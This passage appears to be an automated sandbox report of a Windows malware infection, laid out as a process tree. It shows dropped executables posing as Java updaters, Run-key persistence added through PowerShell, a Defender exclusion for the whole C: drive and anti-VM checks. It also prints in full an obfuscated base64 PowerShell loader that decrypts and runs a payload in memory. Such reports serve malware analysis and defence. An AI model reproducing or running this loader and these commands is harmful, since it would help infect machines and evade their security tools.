        PID:2032
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        50⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        51⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        52⤵
        
        PID:4472
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        53⤵
        
        PID:5780
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        54⤵
        System Location Discovery: System Language Discovery
        
        PID:1908
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        55⤵
        
        PID:2428
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        56⤵
        System Location Discovery: System Language Discovery
        
        PID:2984
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        57⤵
        
        PID:1440
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        58⤵
        System Location Discovery: System Language Discovery
        
        PID:6032
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        59⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        59⤵
        
        PID:872
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        60⤵
        
        PID:1456
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        60⤵
        System Location Discovery: System Language Discovery
        
        PID:3372
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        61⤵
        
        PID:4752
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        61⤵
        System Location Discovery: System Language Discovery
        
        PID:6116
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        62⤵
        
        PID:4020
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        62⤵
        System Location Discovery: System Language Discovery
        
        PID:3772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javasupport_service.exe"
        63⤵
        Modifies registry key
        
        PID:4876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javasupport_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe\"'"
        63⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5684
      - C:\Users\Admin\AppData\Local\Temp\10478710101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478710101\9sWdA2p.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2692
      - C:\Users\Admin\AppData\Local\Temp\10478720101\fbc2c884ad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478720101\fbc2c884ad.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1084
      - C:\Users\Admin\AppData\Local\Temp\10478730101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478730101\Rm3cVPI.exe"
        6⤵
        
        PID:6048
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10478741121\ccosvAs.cmd"
        6⤵
        
        PID:1436
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10478741121\ccosvAs.cmd"
        7⤵
        
        PID:1528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4100
      - C:\Users\Admin\AppData\Local\Temp\10478750101\716b865e0f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478750101\716b865e0f.exe"
        6⤵
        
        PID:4864
      - C:\Users\Admin\AppData\Local\Temp\10478760101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478760101\amnew.exe"
        6⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        
        PID:5536
        
        C:\Users\Admin\AppData\Local\Temp\10053320101\8d86fada47.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053320101\8d86fada47.exe"
        8⤵
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053320101\8d86fada47.exe"
        9⤵
        
        PID:2776
        
        C:\Users\Admin\AppData\Local\Temp\10053330101\d0e24553aa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053330101\d0e24553aa.exe"
        8⤵
        
        PID:5696
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053330101\d0e24553aa.exe"
        9⤵
        
        PID:1436
        
        C:\Users\Admin\AppData\Local\Temp\10053340101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053340101\crypted.exe"
        8⤵
        
        PID:2972
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:1256
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10478771121\5uMVCoG.cmd"
        6⤵
        
        PID:6088
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5616
      - C:\Users\Admin\AppData\Local\Temp\10478780101\qhjMWht.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478780101\qhjMWht.exe"
        6⤵
        
        PID:2464
      - C:\Users\Admin\AppData\Local\Temp\10478790101\larBxd7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10478790101\larBxd7.exe"
        6⤵
        
        PID:3372
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
        7⤵
        
        PID:1104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:4020
- C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
  C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2328

C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3084

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5660

C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
C:\Users\Admin\AppData\Roaming\5uMVCoG.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4928

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe"
1⤵
PID:1084
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4404
- C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
  2⤵
  PID:5336
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
    3⤵
    PID:5236
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
      4⤵
      PID:2688
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3292
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        6⤵
        
        PID:3864
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        7⤵
        
        PID:5752
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1932
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3544
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        10⤵
        
        PID:2280
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        11⤵
        
        PID:3976
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:740
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:5616
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        13⤵
        
        PID:4612
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        14⤵
        System Location Discovery: System Language Discovery
        
        PID:3732
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        15⤵
        System Location Discovery: System Language Discovery
        
        PID:4868
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        16⤵
        
        PID:5928
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        17⤵
        
        PID:5780
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        17⤵
        
        PID:3288
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice.exe"
        18⤵
        Modifies registry key
        
        PID:4248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe\"'"
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe"
1⤵
PID:1296
- C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
  2⤵
  PID:5544
- - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
    3⤵
    PID:2708
  - - C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
      4⤵
      PID:1524
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3976
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        5⤵
        
        PID:3196
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1852
      - C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        6⤵
        
        PID:1552
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        7⤵
        
        PID:4132
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        8⤵
        
        PID:3732
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        9⤵
        
        PID:4200
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        10⤵
        
        PID:1460
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        11⤵
        
        PID:4248
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        12⤵
        
        PID:4488
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        13⤵
        
        PID:5204
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        14⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
        15⤵
        
        PID:4124
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        16⤵
        
        PID:3216
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        17⤵
        
        PID:5732
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        18⤵
        
        PID:4876
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        18⤵
        
        PID:5528
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        19⤵
        
        PID:3708
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        20⤵
        
        PID:5212
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        21⤵
        
        PID:2036
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        22⤵
        
        PID:4200
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        22⤵
        
        PID:4264
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        23⤵
        
        PID:3656
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe
        24⤵
        
        PID:2892
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
